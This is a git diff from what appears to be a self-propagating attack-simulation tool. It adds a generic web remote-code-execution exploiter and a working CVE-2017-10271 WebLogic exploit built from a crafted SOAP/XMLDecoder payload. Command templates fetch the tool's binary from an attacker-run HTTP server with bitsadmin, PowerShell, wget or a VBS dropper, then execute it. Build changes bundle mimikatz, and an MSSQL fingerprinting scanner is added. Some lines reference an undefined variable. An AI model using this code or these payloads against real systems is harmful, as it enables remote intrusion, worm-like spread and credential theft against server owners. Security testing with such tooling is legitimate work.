return "http://%s:%s/%s" % (local_ip, local_port, urllib.quote(os.path.basename(src_path))), httpd
def get_interface_to_target(dst): def get_interface_to_target(dst):
if sys.platform == "win32": if sys.platform == "win32":
@ -405,7 +434,7 @@ def get_interface_to_target(dst):
for d, m, gw, i, a in routes: for d, m, gw, i, a in routes:
aa = atol(a) aa = atol(a)
if aa == dst: if aa == dst:
pathes.append((0xffffffffL, ("lo", a, "0.0.0.0"))) pathes.append((0xffffffff, ("lo", a, "0.0.0.0")))
if (dst & m) == (d & m): if (dst & m) == (d & m):
pathes.append((m, (i, a, gw))) pathes.append((m, (i, a, gw)))
if not pathes: if not pathes:
@ -471,13 +500,33 @@ def build_monkey_commandline(target_host, depth, location=None):
GUID, target_host.default_tunnel, target_host.default_server, depth, location) GUID, target_host.default_tunnel, target_host.default_server, depth, location)
def get_binaries_dir_path():
if getattr(sys, 'frozen', False):
return sys._MEIPASS
else:
return os.path.dirname(os.path.abspath(__file__))
def get_monkey_depth(): def get_monkey_depth():
from config import WormConfiguration from config import WormConfiguration
return WormConfiguration.depth return WormConfiguration.depth
def get_monkey_dest_path(url_to_monkey):
"""
Gets destination path from monkey's source url.
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from configuration
"""
from config import WormConfiguration
if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
return False
try:
if 'linux' in url_to_monkey:
return WormConfiguration.dropper_target_path_linux
elif 'windows-32' in url_to_monkey:
return WormConfiguration.dropper_target_path_win_32
elif 'windows-64' in url_to_monkey:
return WormConfiguration.dropper_target_path_win_64
else:
LOG.error("Could not figure out what type of monkey server was trying to upload, "
"thus destination path can not be chosen.")
return False
except AttributeError:
LOG.error("Seems like monkey's source configuration property names changed. "
"Can not get destination path to upload monkey")
return False

View File

@ -0,0 +1,479 @@
import logging
from exploit import HostExploiter
from model import *
from posixpath import join
import re
from abc import abstractmethod
from exploit.tools import get_target_monkey, get_monkey_depth, build_monkey_commandline, HTTPTools
from network.tools import check_tcp_port, tcp_port_to_service
__author__ = 'VakarisZ'
LOG = logging.getLogger(__name__)
# Command used to check if monkeys already exists
LOOK_FOR_FILE = "ls %s"
POWERSHELL_NOT_FOUND = "owershell is not recognized"
# Constants used to refer to windows architectures( used in host.os['machine'])
WIN_ARCH_32 = "32"
WIN_ARCH_64 = "64"
class WebRCE(HostExploiter):
def __init__(self, host, monkey_target_paths=None):
"""
:param host: Host that we'll attack
:param monkey_target_paths: Where to upload the monkey at the target host system.
Dict in format {'linux': '/tmp/monkey.sh', 'win32': './monkey32.exe', 'win64':... }
"""
super(WebRCE, self).__init__(host)
self._config = __import__('config').WormConfiguration
if monkey_target_paths:
self.monkey_target_paths = monkey_target_paths
else:
self.monkey_target_paths = {'linux': self._config.dropper_target_path_linux,
'win32': self._config.dropper_target_path_win_32,
'win64': self._config.dropper_target_path_win_64}
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
self.skip_exist = self._config.skip_exploit_if_file_exist
self.vulnerable_urls = []
def get_exploit_config(self):
"""
Method that creates a dictionary of configuration values for exploit
:return: configuration dict
"""
exploit_config = dict()
# dropper: If true monkey will use dropper parameter that will detach monkey's process and try to copy
# it's file to the default destination path.
exploit_config['dropper'] = False
# upload_commands: Unformatted dict with one or two commands {'linux': WGET_HTTP_UPLOAD,'windows': WIN_CMD}
# Command must have "monkey_path" and "http_path" format parameters. If None defaults will be used.
exploit_config['upload_commands'] = None
# url_extensions: What subdirectories to scan (www.domain.com[/extension]). Eg. ["home", "index.php"]
exploit_config['url_extensions'] = None
# stop_checking_urls: If true it will stop checking vulnerable urls once one was found vulnerable.
exploit_config['stop_checking_urls'] = False
# blind_exploit: If true we won't check if file exist and won't try to get the architecture of target.
exploit_config['blind_exploit'] = False
return exploit_config
def exploit_host(self):
"""
Method that contains default exploitation workflow
:return: True if exploited, False otherwise
"""
# We get exploit configuration
exploit_config = self.get_exploit_config()
# Get open ports
ports = self.get_ports_w(self.HTTP, ["http"])
if not ports:
return False
# Get urls to try to exploit
urls = self.build_potential_urls(ports, exploit_config['url_extensions'])
self.add_vulnerable_urls(urls, exploit_config['stop_checking_urls'])
if not self.vulnerable_urls:
return False
# Skip if monkey already exists and this option is given
if not exploit_config['blind_exploit'] and self.skip_exist and self.check_remote_files(self.vulnerable_urls[0]):
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True
# Check for targets architecture (if it's 32 or 64 bit)
if not exploit_config['blind_exploit'] and not self.set_host_arch(self.vulnerable_urls[0]):
return False
# Upload the right monkey to target
data = self.upload_monkey(self.vulnerable_urls[0], exploit_config['upload_commands'])
if data is False:
return False
# Change permissions to transform monkey into executable file
if self.change_permissions(self.vulnerable_urls[0], data['path']) is False:
return False
# Execute remote monkey
if self.execute_remote_monkey(self.vulnerable_urls[0], data['path'], exploit_config['dropper']) is False:
return False
return True
@abstractmethod
def exploit(self, url, command):
"""
A reference to a method which implements web exploit logic.
:param url: Url to send malicious packet to. Format: [http/https]://ip:port/extension.
:param command: Command which will be executed on remote host
:return: RCE's output/True if successful or False if failed
"""
raise NotImplementedError()
def get_open_service_ports(self, port_list, names):
"""
:param port_list: Potential ports to exploit. For example _config.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Returns all open ports from port list that are of service names
"""
candidate_services = {}
candidate_services.update({
service: self.host.services[service] for service in self.host.services if
(self.host.services[service] and self.host.services[service]['name'] in names)
})
valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if
tcp_port_to_service(port) in candidate_services]
return valid_ports
def check_if_port_open(self, port):
is_open, _ = check_tcp_port(self.host.ip_addr, port)
if not is_open:
LOG.info("Port %d is closed on %r, skipping", port, self.host)
return False
return True
def get_command(self, path, http_path, commands):
try:
if 'linux' in self.host.os['type']:
command = commands['linux']
else:
command = commands['windows']
# Format command
command = command % {'monkey_path': path, 'http_path': http_path}
except KeyError:
LOG.error("Provided command is missing/bad for this type of host! "
"Check upload_monkey function docs before using custom monkey's upload commands.")
return False
return command
def check_if_exploitable(self, url):
"""
Checks if target is exploitable by interacting with url
:param url: Url to exploit
:return: True if exploitable and false if not
"""
try:
resp = self.exploit(url, CHECK_COMMAND)
if resp is True:
return True
elif resp is not False and ID_STRING in resp:
return True
else:
return False
except Exception as e:
LOG.error("Host's exploitability check failed due to: %s" % e)
return False
def build_potential_urls(self, ports, extensions=None):
"""
:param ports: Array of ports. One port is described as size 2 array: [port.no(int), isHTTPS?(bool)]
Eg. ports: [[80, False], [443, True]]
:param extensions: What subdirectories to scan. www.domain.com[/extension]
:return: Array of url's to try and attack
"""
url_list = []
if extensions:
extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
else:
extensions = [""]
for port in ports:
for extension in extensions:
if port[1]:
protocol = "https"
else:
protocol = "http"
url_list.append(join(("%s://%s:%s" % (protocol, self.host.ip_addr, port[0])), extension))
if not url_list:
LOG.info("No attack url's were built")
return url_list
def add_vulnerable_urls(self, urls, stop_checking=False):
"""
Gets vulnerable url(s) from url list
:param urls: Potentially vulnerable urls
:param stop_checking: If we want to continue checking for vulnerable url even though one is found (bool)
:return: None (we append to class variable vulnerable_urls)
"""
for url in urls:
if self.check_if_exploitable(url):
self.vulnerable_urls.append(url)
if stop_checking:
break
if not self.vulnerable_urls:
LOG.info("No vulnerable urls found, skipping.")
# We add urls to param used in reporting
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
def get_host_arch(self, url):
"""
:param url: Url for exploiter to use
:return: Machine architecture string or false. Eg. 'i686', '64', 'x86_64', ...
"""
if 'linux' in self.host.os['type']:
resp = self.exploit(url, GET_ARCH_LINUX)
if resp:
# Pulls architecture string
arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
try:
arch = arch.group(1)
except AttributeError:
LOG.error("Looked for linux architecture but could not find it")
return False
if arch:
return arch
else:
LOG.info("Could not pull machine architecture string from command's output")
return False
else:
return False
else:
resp = self.exploit(url, GET_ARCH_WINDOWS)
if resp:
if "64-bit" in resp:
return WIN_ARCH_64
else:
return WIN_ARCH_32
else:
return False
def check_remote_monkey_file(self, url, path):
command = LOOK_FOR_FILE % path
resp = self.exploit(url, command)
if 'No such file' in resp:
return False
else:
LOG.info("Host %s was already infected under the current configuration, done" % host)
return True
def check_remote_files(self, url):
"""
:param url: Url for exploiter to use
:return: True if at least one file is found, False otherwise
"""
paths = []
if 'linux' in self.host.os['type']:
paths.append(self.monkey_target_paths['linux'])
else:
paths.extend([self.monkey_target_paths['win32'], self.monkey_target_paths['win64']])
for path in paths:
if self.check_remote_monkey_file(url, path):
return True
return False
# Wrapped functions:
def get_ports_w(self, ports, names):
"""
Get ports wrapped with log
:param ports: Potential ports to exploit. For example WormConfiguration.HTTP_PORTS
:param names: [] of service names. Example: ["http"]
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
"""
ports = self.get_open_service_ports(ports, names)
if not ports:
LOG.info("All default web ports are closed on %r, skipping", host)
return False
else:
return ports
def set_host_arch(self, url):
arch = self.get_host_arch(url)
if not arch:
LOG.error("Couldn't get host machine's architecture")
return False
else:
self.host.os['machine'] = arch
return True
def run_backup_commands(self, resp, url, dest_path, http_path):
"""
If you need multiple commands for the same os you can override this method to add backup commands
:param resp: Response from base command
:param url: Vulnerable url
:param dest_path: Where to upload monkey
:param http_path: Where to download monkey from
:return: Command's response (same response if backup command is not needed)
"""
if not isinstance(resp, bool) and POWERSHELL_NOT_FOUND in resp:
LOG.info("Powershell not found in host. Using bitsadmin to download.")
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': dest_path, 'http_path': http_path}
resp = self.exploit(url, backup_command)
return resp
def upload_monkey(self, url, commands=None):
"""
:param url: Where exploiter should send it's request
:param commands: Unformatted dict with one or two commands {'linux': LIN_CMD, 'windows': WIN_CMD}
Command must have "monkey_path" and "http_path" format parameters.
:return: {'response': response/False, 'path': monkeys_path_in_host}
"""
LOG.info("Trying to upload monkey to the host.")
if not self.host.os['type']:
LOG.error("Unknown target's os type. Skipping.")
return False
paths = self.get_monkey_paths()
if not paths:
return False
# Create server for http download and wait for it's startup.
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths['src_path'])
if not http_path:
LOG.debug("Exploiter failed, http transfer creation failed.")
return False
LOG.info("Started http server on %s", http_path)
# Choose command:
if not commands:
commands = {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD}
command = self.get_command(paths['dest_path'], http_path, commands)
resp = self.exploit(url, command)
resp = self.run_backup_commands(resp, url, paths['dest_path'], http_path)
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
LOG.info("Uploading process finished")
# If response is false exploiter failed
if resp is False:
return resp
else:
return {'response': resp, 'path': paths['dest_path']}
def change_permissions(self, url, path, command=None):
"""
Method for linux hosts. Makes monkey executable
:param url: Where to send malicious packets
:param path: Path to monkey on remote host
:param command: Formatted command for permission change or None
:return: response, False if failed and True if permission change is not needed
"""
LOG.info("Changing monkey's permissions")
if 'windows' in self.host.os['type']:
LOG.info("Permission change not required for windows")
return True
if not command:
command = CHMOD_MONKEY % {'monkey_path': path}
try:
resp = self.exploit(url, command)
except Exception as e:
LOG.error("Something went wrong while trying to change permission: %s" % e)
return False
# If exploiter returns True / False
if type(resp) is bool:
LOG.info("Permission change finished")
return resp
# If exploiter returns command output, we can check for execution errors
if 'Operation not permitted' in resp:
LOG.error("Missing permissions to make monkey executable")
return False
elif 'No such file or directory' in resp:
LOG.error("Could not change permission because monkey was not found. Check path parameter.")
return False
LOG.info("Permission change finished")
return resp
def execute_remote_monkey(self, url, path, dropper=False):
"""
This method executes remote monkey
:param url: Where to send malicious packets
:param path: Path to monkey on remote host
:param dropper: Should remote monkey be executed with dropper or with monkey arg?
:return: Response or False if failed
"""
LOG.info("Trying to execute remote monkey")
# Get monkey command line
if dropper and path:
# If dropper is chosen we try to move monkey to default location
default_path = self.get_default_dropper_path()
if default_path is False:
return False
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
else:
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
try:
resp = self.exploit(url, command)
# If exploiter returns True / False
if type(resp) is bool:
LOG.info("Execution attempt successfully finished")
return resp
# If exploiter returns command output, we can check for execution errors
if 'is not recognized' in resp or 'command not found' in resp:
LOG.error("Wrong path chosen or other process already deleted monkey")
return False
elif 'The system cannot execute' in resp:
LOG.error("System could not execute monkey")
return False
except Exception as e:
LOG.error("Something went wrong when trying to execute remote monkey: %s" % e)
return False
LOG.info("Execution attempt finished")
return resp
def get_monkey_upload_path(self, url_to_monkey):
"""
Gets destination path from one of WEB_RCE predetermined paths(self.monkey_target_paths).
:param url_to_monkey: Hosted monkey's url. egz : http://localserver:9999/monkey/windows-32.exe
:return: Corresponding monkey path from self.monkey_target_paths
"""
if not url_to_monkey or ('linux' not in url_to_monkey and 'windows' not in url_to_monkey):
LOG.error("Can't get destination path because source path %s is invalid.", url_to_monkey)
return False
try:
if 'linux' in url_to_monkey:
return self.monkey_target_paths['linux']
elif 'windows-32' in url_to_monkey:
return self.monkey_target_paths['win32']
elif 'windows-64' in url_to_monkey:
return self.monkey_target_paths['win64']
else:
LOG.error("Could not figure out what type of monkey server was trying to upload, "
"thus destination path can not be chosen.")
return False
except KeyError:
LOG.error("Unknown key was found. Please use \"linux\", \"win32\" and \"win64\" keys to initialize "
"custom dict of monkey's destination paths")
return False
def get_monkey_paths(self):
"""
Gets local (used by server) and destination (where to download) paths.
:return: dict of source and destination paths
"""
src_path = get_target_monkey(self.host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
# Determine which destination path to use
dest_path = self.get_monkey_upload_path(src_path)
if not dest_path:
return False
return {'src_path': src_path, 'dest_path': dest_path}
def get_default_dropper_path(self):
"""
Gets default dropper path for the host.
:return: Default monkey's destination path for corresponding host or False if failed.
E.g. config.dropper_target_path_linux(/tmp/monkey.sh) for linux host
"""
if not self.host.os.get('type') or (self.host.os['type'] != 'linux' and self.host.os['type'] != 'windows'):
LOG.error("Target's OS was either unidentified or not supported. Aborting")
return False
if self.host.os['type'] == 'linux':
return self._config.dropper_target_path_linux
if self.host.os['type'] == 'windows':
try:
if self.host.os['machine'] == WIN_ARCH_64:
return self._config.dropper_target_path_win_64
except KeyError:
LOG.debug("Target's machine type was not set. Using win-32 dropper path.")
return self._config.dropper_target_path_win_32

View File

@ -0,0 +1,197 @@
# Exploit based of:
# Kevin Kirsche (d3c3pt10n)
# https://github.com/kkirsche/CVE-2017-10271
# and
# Luffin from Github
# https://github.com/Luffin/CVE-2017-10271
# CVE: CVE-2017-10271
from requests import post, exceptions
from web_rce import WebRCE
from exploit.tools import get_free_tcp_port, get_interface_to_target
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading
import logging
__author__ = "VakarisZ"
LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds
SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15
URLS = ["/wls-wsat/CoordinatorPortType",
"/wls-wsat/CoordinatorPortType11",
"/wls-wsat/ParticipantPortType",
"/wls-wsat/ParticipantPortType11",
"/wls-wsat/RegistrationPortTypeRPC",
"/wls-wsat/RegistrationPortTypeRPC11",
"/wls-wsat/RegistrationRequesterPortType",
"/wls-wsat/RegistrationRequesterPortType11"]
# Malicious request's headers:
HEADERS = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
"AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
}
class WebLogicExploiter(WebRCE):
_TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host):
super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
'win32': 'monkey32.exe',
'win64': 'monkey64.exe'})
def get_exploit_config(self):
exploit_config = super(WebLogicExploiter, self).get_exploit_config()
exploit_config['blind_exploit'] = True
exploit_config['stop_checking_urls'] = True
exploit_config['url_extensions'] = URLS
return exploit_config
def exploit(self, url, command):
if 'linux' in self.host.os['type']:
payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
else:
payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
try:
post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
except Exception as e:
print('[!] Connection Error')
print(e)
return True
def check_if_exploitable(self, url):
# Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server()
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error
pass
except Exception as e:
LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0
def _start_http_server(self):
"""
Starts custom http server that waits for GET requests
:return: httpd (IndicationHTTPServer daemon object handler), lock (acquired lock)
"""
lock = threading.Lock()
local_port = get_free_tcp_port()
local_ip = get_interface_to_target(self.host.ip_addr)
httpd = self.IndicationHTTPServer(local_ip, local_port, lock)
lock.acquire()
httpd.start()
lock.acquire()
return httpd, lock
def _stop_http_server(self, httpd, lock):
lock.release()
httpd.join(SERVER_TIMEOUT)
httpd.stop()
@staticmethod
def get_exploit_payload(cmd_base, cmd_opt, command):
"""
Formats the payload used in exploiting weblogic servers
:param cmd_base: What command prompt to use eg. cmd
:param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
:param command: command itself
:return: Formatted payload
"""
empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3" >
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
return payload
@staticmethod
def get_test_payload(ip, port):
"""
Gets payload used for testing whether weblogic server is vulnerable
:param ip: Server's IP
:param port: Server's port
:return: Formatted payload
"""
generic_check_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<void id="url" class="java.net.URL">
<string>http://{host}:{port}</string>
</void>
<void idref="url">
<void id="stream" method = "openStream" />
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
payload = generic_check_payload.format(host=ip, port=port)
return payload
class IndicationHTTPServer(threading.Thread):
"""
Http server built to wait for GET requests. Because oracle web logic vuln is blind,
we determine if we can exploit by either getting a GET request from host or not.
"""
def __init__(self, local_ip, local_port, lock, max_requests=1):
self._local_ip = local_ip
self._local_port = local_port
self.get_requests = 0
self.max_requests = max_requests
self._stopped = False
self.lock = lock
threading.Thread.__init__(self)
self.daemon = True
def run(self):
class S(BaseHTTPRequestHandler):
@staticmethod
def do_GET():
LOG.info('Server received a request from vulnerable machine')
self.get_requests += 1
LOG.info('Server waiting for exploited machine request...')
httpd = HTTPServer((self._local_ip, self._local_port), S)
httpd.daemon = True
self.lock.release()
while not self._stopped and self.get_requests < self.max_requests:
httpd.handle_request()
self._stopped = True
return httpd
def stop(self):
self._stopped = True

View File

@ -0,0 +1,31 @@
from host import VictimHost
__author__ = 'itamar'
MONKEY_ARG = "m0nk3y"
DROPPER_ARG = "dr0pp3r"
ID_STRING = "M0NK3Y3XPL0ITABLE"
DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, )
RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
# Commands used to check for architecture and if machine is exploitable
CHECK_COMMAND = "echo %s" % ID_STRING
# Architecture checking commands
GET_ARCH_WINDOWS = "wmic os get osarchitecture"
GET_ARCH_LINUX = "lscpu"
DOWNLOAD_TIMEOUT = 300

View File

@ -29,7 +29,7 @@ class VictimHost(object):
return self.ip_addr.__cmp__(other.ip_addr) return self.ip_addr.__cmp__(other.ip_addr)
def __repr__(self): def __repr__(self):
return "<VictimHost %s>" % self.ip_addr return "VictimHost({0!r})".format(self.ip_addr)
def __str__(self): def __str__(self):
victim = "Victim Host %s: " % self.ip_addr victim = "Victim Host %s: " % self.ip_addr
@ -39,7 +39,7 @@ class VictimHost(object):
victim += "] Services - [" victim += "] Services - ["
for k, v in self.services.items(): for k, v in self.services.items():
victim += "%s-%s " % (k, v) victim += "%s-%s " % (k, v)
victim += ']' victim += '] '
victim += "target monkey: %s" % self.monkey_exe victim += "target monkey: %s" % self.monkey_exe
return victim return victim

View File

@ -12,6 +12,7 @@ from control import ControlClient
from model import DELAY_DELETE_CMD from model import DELAY_DELETE_CMD
from network.firewall import app as firewall from network.firewall import app as firewall
from network.network_scanner import NetworkScanner from network.network_scanner import NetworkScanner
from six.moves import xrange
from system_info import SystemInfoCollector from system_info import SystemInfoCollector
from system_singleton import SystemSingleton from system_singleton import SystemSingleton
from windows_upgrader import WindowsUpgrader from windows_upgrader import WindowsUpgrader

View File

@ -1,22 +1,30 @@
# -*- mode: python -*- # -*- mode: python -*-
import os import os
import platform import platform
# Name of zip file in monkey. That's the name of the file in the _MEI folder
MIMIKATZ_ZIP_NAME = 'tmpzipfile123456.zip'
def get_mimikatz_zip_path():
if platform.architecture()[0] == "32bit":
return '.\\bin\\mk32.zip'
else:
return '.\\bin\\mk64.zip'
a = Analysis(['main.py'], a = Analysis(['main.py'],
pathex=['.', '..'], pathex=['.', '..'],
hiddenimports=['_cffi_backend', 'queue'], hiddenimports=['_cffi_backend', 'queue'],
hookspath=None, hookspath=None,
runtime_hooks=None) runtime_hooks=None)
a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')]
a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
a.binaries += [('sc_monkey_runner32.so', '.\\bin\\sc_monkey_runner32.so', 'BINARY')] if platform.system().find("Windows") >= 0:
a.binaries += [('sc_monkey_runner64.so', '.\\bin\\sc_monkey_runner64.so', 'BINARY')]
if platform.system().find("Windows")>= 0:
a.datas = [i for i in a.datas if i[0].find('Include') < 0] a.datas = [i for i in a.datas if i[0].find('Include') < 0]
if platform.architecture()[0] == "32bit": a.datas += [(MIMIKATZ_ZIP_NAME, get_mimikatz_zip_path(), 'BINARY')]
a.binaries += [('mk.dll', '.\\bin\\mk32.dll', 'BINARY')]
else:
a.binaries += [('mk.dll', '.\\bin\\mk64.dll', 'BINARY')]
pyz = PYZ(a.pure) pyz = PYZ(a.pure)
exe = EXE(pyz, exe = EXE(pyz,
@ -28,4 +36,5 @@ exe = EXE(pyz,
debug=False, debug=False,
strip=None, strip=None,
upx=True, upx=True,
console=True , icon='monkey.ico') console=True,
icon='monkey.ico')

View File

@ -27,3 +27,4 @@ from elasticfinger import ElasticFinger
from mysqlfinger import MySQLFinger from mysqlfinger import MySQLFinger
from info import local_ips from info import local_ips
from info import get_free_tcp_port from info import get_free_tcp_port
from mssql_fingerprint import MSSQLFinger

View File

@ -10,6 +10,11 @@ from subprocess import check_output
from random import randint from random import randint
from common.network.network_range import CidrRange from common.network.network_range import CidrRange
try:
long # Python 2
except NameError:
long = int # Python 3
def get_host_subnets(): def get_host_subnets():
""" """
@ -93,8 +98,8 @@ else:
ifaddr = socket.inet_ntoa(ifreq[20:24]) ifaddr = socket.inet_ntoa(ifreq[20:24])
else: else:
continue continue
routes.append((socket.htonl(long(dst, 16)) & 0xffffffffL, routes.append((socket.htonl(long(dst, 16)) & 0xffffffff,
socket.htonl(long(msk, 16)) & 0xffffffffL, socket.htonl(long(msk, 16)) & 0xffffffff,
socket.inet_ntoa(struct.pack("I", long(gw, 16))), socket.inet_ntoa(struct.pack("I", long(gw, 16))),
iff, ifaddr)) iff, ifaddr))

View File

@ -0,0 +1,82 @@
import logging
import socket
from model.host import VictimHost
from network import HostFinger
__author__ = 'Maor Rayzin'
LOG = logging.getLogger(__name__)
class MSSQLFinger(HostFinger):
# Class related consts
SQL_BROWSER_DEFAULT_PORT = 1434
BUFFER_SIZE = 4096
TIMEOUT = 5
SERVICE_NAME = 'MSSQL'
def __init__(self):
self._config = __import__('config').WormConfiguration
def get_host_fingerprint(self, host):
"""Gets Microsoft SQL Server instance information by querying the SQL Browser service.
:arg:
host (VictimHost): The MS-SSQL Server to query for information.
:returns:
Discovered server information written to the Host info struct.
True if success, False otherwise.
"""
assert isinstance(host, VictimHost)
# Create a UDP socket and sets a timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(self.TIMEOUT)
server_address = (str(host.ip_addr), self.SQL_BROWSER_DEFAULT_PORT)
# The message is a CLNT_UCAST_EX packet to get all instances
# https://msdn.microsoft.com/en-us/library/cc219745.aspx
message = '\x03'
# Encode the message as a bytesarray
message = message.encode()
# send data and receive response
try:
LOG.info('Sending message to requested host: {0}, {1}'.format(host, message))
sock.sendto(message, server_address)
data, server = sock.recvfrom(self.BUFFER_SIZE)
except socket.timeout:
LOG.info('Socket timeout reached, maybe browser service on host: {0} doesnt exist'.format(host))
sock.close()
return False
except socket.error as e:
if e.errno == socket.errno.ECONNRESET:
LOG.info('Connection was forcibly closed by the remote host. The host: {0} is rejecting the packet.'
.format(host))
else:
LOG.error('An unknown socket error occurred while trying the mssql fingerprint, closing socket.',
exc_info=True)
sock.close()
return False
host.services[self.SERVICE_NAME] = {}
# Loop through the server data
instances_list = data[3:].decode().split(';;')
LOG.info('{0} MSSQL instances found'.format(len(instances_list)))
for instance in instances_list:
instance_info = instance.split(';')
if len(instance_info) > 1:
host.services[self.SERVICE_NAME][instance_info[1]] = {}
for i in range(1, len(instance_info), 2):
# Each instance's info is nested under its own name, if there are multiple instances
# each will appear under its own name
host.services[self.SERVICE_NAME][instance_info[1]][instance_info[i - 1]] = instance_info[i]
# Close the socket
sock.close()
return True

View File

@ -36,8 +36,32 @@ class NetworkScanner(object):
self._ranges = [NetworkRange.get_range_obj(address_str=x) for x in WormConfiguration.subnet_scan_list] self._ranges = [NetworkRange.get_range_obj(address_str=x) for x in WormConfiguration.subnet_scan_list]
